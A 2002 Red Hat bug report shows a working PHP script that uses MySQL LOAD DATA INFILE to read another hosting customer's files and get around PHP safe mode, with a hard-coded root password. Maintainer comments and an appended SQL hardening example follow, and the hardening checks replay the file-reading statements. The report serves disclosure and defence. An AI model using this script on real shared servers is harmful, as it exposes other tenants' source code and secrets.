Bug 59916

Summary: PHP in safe mode can read all the server contents
Product: [Retired] Red Hat Linux
Reporter: Renato <renato>
Component: mysql
Assignee: Patrick Macdonald <patrickm>
Status: CLOSED NOTABUG
QA Contact: David Lawrence <dkl>
Severity: medium
Priority: medium
Version: 7.2
Keywords: Security
Hardware: i386
OS: Linux
Doc Type: Bug Fix
Last Closed: 2002-02-27 13:53:57 UTC

Description Renato 2002-02-14 20:26:06 UTC
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)

Description of problem:
By using a flaw in a PHP+MySQL query, somebody can bypass safe mode.

Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
1. Use the script:

<?php
/* Reporter's demonstration script (PHP 4.0.6, mysql extension, Apache module).
   It asks the MySQL server to read a file that PHP's safe mode would refuse
   to open, then echoes the contents back to the browser. */

$host = 'localhost';
$user = 'root';           /* shared DB account, holds the FILE privilege */
$pass = 'letmein';
$db   = 'teste';

$filename = '/home/othercliente/myscript.php'; /* File to grab from the [local] server */
$local = true;                                 /* Read from local filesystem */

/* With LOCAL the file is read by the MySQL client library inside the PHP
   process; without it, mysqld reads the file itself. Neither path goes
   through PHP's own file functions, so the safe_mode checks never run. */
$local = $local ? 'LOCAL' : '';

$sql = array (
   "USE $db",

   /* One LONGBLOB column, so the whole file lands in a single field */
   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

   /* Delimiters that never occur in the file, so it loads as one row */
   "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass)
   or die ('CONNECT FAILED: ' . mysql_error () . "\n");

foreach ($sql as $statement) {
   $q = mysql_query ($statement);

   if ($q == false) die (
      "FAILED: " . $statement . "\n" .
      "REASON: " . mysql_error () . "\n"
   );

   /* USE, CREATE and LOAD DATA return TRUE rather than a result set;
      only the final SELECT yields a row to print */
   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

   echo $r [0];               /* the other client's source code */
   mysql_free_result ($q);
}
?>

2. Call the script using wget http://server/script

Actual Results:  You can view the source of the other client

Additional info:

Comment 1 Phil Copeland 2002-02-14 21:28:13 UTC
rpm -q php
I need to know which one it is please 

cheers

Phil
=--=

Comment 2 Renato 2002-02-15 10:40:35 UTC
php: 4.0.6-7
php-mysql: 4.0.6-7

It's configured as a module in Apache.

Comment 3 Peter Bowen 2002-02-27 13:53:52 UTC
This is not a bug in PHP.  This is a potential bug with MySQL, but PHP's safe
mode cannot prevent this.  PHP can only protect internal PHP functions, and
mysql_* use the mysql client library.  I'm moving this to the MySQL component,
as it can only be handled there.

Comment 4 Trond Eivind Glomsrød 2002-04-08 19:31:47 UTC
This is not a bug in mysql, it does what you want and it can do. Don't set up
unsafe scripts
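Comments 3 and 4 locate the fix on the MySQL side: the file read is performed by mysqld (server-side INFILE, which needs the FILE privilege) or by libmysqlclient inside the PHP process (LOCAL INFILE, which needs local_infile enabled on server and client), and neither path passes through the PHP functions that safe mode guards. The following is an added example, not code from the bug report or from Red Hat, showing how an administrator of a shared host would close both paths. The schema and account names (tenant_a, tenant_b), the password placeholder and the directory /var/lib/mysql-files are assumptions for illustration; the path /home/othercliente/myscript.php is the one from the report.

```sql
-- Added example (not from the bug report): how to make the reported script fail.
-- Account names, password placeholder and directory paths are assumptions.

-- 1. What the script relies on: every site shares one account with FILE
--    privilege, and the server accepts LOCAL INFILE from any client.
SHOW GRANTS FOR 'root'@'localhost';   -- "GRANT ALL PRIVILEGES ON *.* ..." includes FILE
SHOW VARIABLES LIKE 'local_infile';   -- ON by default on servers of that era

-- 2. Server-side hardening (local_infile is a global variable from MySQL 4.0.3;
--    secure_file_priv exists from 5.1.17 and can only be set in my.cnf).
--    Set both in my.cnf as well so they survive a restart:
--      [mysqld]
--      local-infile=0
--      secure-file-priv=/var/lib/mysql-files
SET GLOBAL local_infile = 0;          -- refuse LOAD DATA LOCAL INFILE from every client

-- 3. One least-privilege account per hosted site: no FILE, no SUPER, no
--    access to any other tenant's schema. (GRANT ... IDENTIFIED BY is the
--    pre-8.0 syntax that matches the era of this report; on 8.0 run
--    CREATE USER first and GRANT without IDENTIFIED BY.)
GRANT SELECT, INSERT, UPDATE, DELETE, CREATE TEMPORARY TABLES
    ON tenant_a.* TO 'tenant_a'@'localhost' IDENTIFIED BY 'change-me-a';
GRANT SELECT, INSERT, UPDATE, DELETE, CREATE TEMPORARY TABLES
    ON tenant_b.* TO 'tenant_b'@'localhost' IDENTIFIED BY 'change-me-b';
FLUSH PRIVILEGES;

-- 4. Check, connected as tenant_a: the statements from the report must now fail.
--    Without LOCAL: ERROR 1045 (28000) Access denied ... because FILE is missing.
--    With LOCAL and local_infile=0: ERROR 1148 (42000) The used command is not
--    allowed with this MySQL version (8.0 reports ERROR 3948 instead).
CREATE TEMPORARY TABLE A1 (a LONGBLOB);
LOAD DATA INFILE '/home/othercliente/myscript.php' INTO TABLE A1
    FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY ''
    LINES TERMINATED BY '__THIS_NEVER_HAPPENS__';
LOAD DATA LOCAL INFILE '/home/othercliente/myscript.php' INTO TABLE A1
    FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY ''
    LINES TERMINATED BY '__THIS_NEVER_HAPPENS__';
```

Two of these controls are easy to mix up. secure_file_priv only constrains reads and writes that mysqld performs itself (server-side INFILE, SELECT ... INTO OUTFILE, LOAD_FILE()); it does nothing against the LOCAL variant, where the client library reads the file and sends the bytes over the connection, so local_infile=0 is the setting that closes the path the report's $local = true case uses. Per-tenant accounts without FILE close the other path and, as a side effect, stop one hosted site from reading another site's tables with the same shared root login.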